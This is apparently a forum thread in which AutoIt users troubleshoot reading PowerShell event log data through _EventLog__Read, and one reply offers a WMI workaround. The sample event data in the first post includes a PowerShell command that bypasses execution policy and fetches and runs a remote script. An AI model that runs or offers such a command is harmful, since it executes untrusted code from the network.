Reading details from the Windows Event Log

[jayinoz]

Hi folks,

I'm looking to read detailed information from the Windows PowerShell event log.

I can get system information, using the sample script (from https://www.autoitscript.com/autoit3/docs/libfunctions/_EventLog__Read.htm), e.g.

Result ............: True
Record number .....: 2148
Submitted .........: 10/23/2017 10:14:40 PM
Generated .........: 10/23/2017 10:14:40 PM
Event ID ..........: 403
Type ..............: Information
Category ..........: 4
Source ............: PowerShell
Computer ..........: XXXX.YYYY.com
Username ..........:

But what I'm not able to get is the Event Data, e.g.

Stopped
Available
NewEngineState=Stopped PreviousEngineState=Available SequenceNumber=15 HostName=ConsoleHost HostVersion=5.1.14393.1532 HostId=41e45e12-e143-4e82-9882-4df8547b61ba HostApplication=powershell.exe -ep Bypass -nop -c iex ((New-Object Net.WebClient).DownloadString('https://test.123.com/file.ps1')) EngineVersion=5.1.14393.1532 RunspaceId=f328f446-0e4f-401a-8d8e-2dd051e45a80 PipelineId= CommandName= CommandType= ScriptName= CommandPath= CommandLine=

By the look of EventLog.au3, (and I may have got all this wrong):

 $aEvent[14] = __EventLog_DecodeData($tEventLog)

...should contain this data as an array, with $aData[0] set as the length of the array in Func __EventLog_DecodeData.

Using the sample, when I set $f14 = $aEvent[14] and look at $f14[0] I get zero, whereas I think this should contain the length of the array containing event data.

Does anybody know what is gong wrong here?

Thanks,

Jason

[Jimwright]

I recall having issues with the inbuilt event viewer when putting together a quick monitoring programme to send to our clients.  In  a rush I just used the WMI to get the description.  I was just grabbing the last 10 App and System events:

 

expandcollapse popup

$AppEV=_EventLog__Open("", "Application")
$SysEV=_EventLog__Open("", "System")
ReadEV("Application")

Func ReadEV($type)
Local $RV=@crlf&"Last 10 "&$type&" Events" & @crlf
For $i=1 to 10
    if $type='Application' then
Local $Event = _EventLog__Read($AppEV, True, False) ; read last event
Else
    Local $Event = _EventLog__Read($SysEV, True, False) ; read last event
    endif
IF $Event[0]=True then
$RV=$RV&"DateTime: " & $Event[2] & " " & $Event[3] & @crlf & _
"Event Type: " & $Event[8] & @crlf & "EventID: " & $Event[6] & @crlf & _
GetEVDesc($Event[1],$type) & @crlf & dash() & @crlf
Else
   $RV=$Rv & "Failed to read Event Log " & $i & @CRLF
EndIf
next
Return $RV
EndFunc

Func GetEVDesc($No,$Type)
#cs
The inbuilt EV function _EventLog__Read has a bug and doesnt read the full source or description; this
is a workaround using the standard WMI functions
#Ce
Local $strComputer = "."
Local $objWMIService = ObjGet("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\" & $strComputer & "\root\cimv2")
Local $ColEVM=$objWMIService.ExecQuery _
    ("Select * From Win32_NTLogEvent Where Logfile = '"&$Type&"' AND " & _
        "RecordNumber = " & $No)
for $objI in $colEvm
   $rv="Event Source: "& $objI.sourcename & @crlf & "Event Description: "&$objI.message
   return $rv
Next
EndFunc

 

[gruntydatsun]

$aEvent[14] is showing as an 1d array with one element containing 0 on my machine at work too. 

I stepped through it a bit and found this is the first point where things start to go pear shaped.

 

EventLog.au3

Function:
Func __EventLog_DecodeData($tEventLog)
Line:

Local $iLength = DllStructGetData($tEventLog, "DataLength")

This line is the first time it appears to fall over.  DllStructGetData is returning zero which is listed as the return value for a failure but its not setting the @error macro (still at 0)?? 

then line:
 

Local $tBuffer = DllStructCreate("byte[" & $iLength & "]", $pEventLog + $iOffset)

errors out reporting "there is an unknown data type in the string passed"

 

 Perhaps someone smarter knows whats up?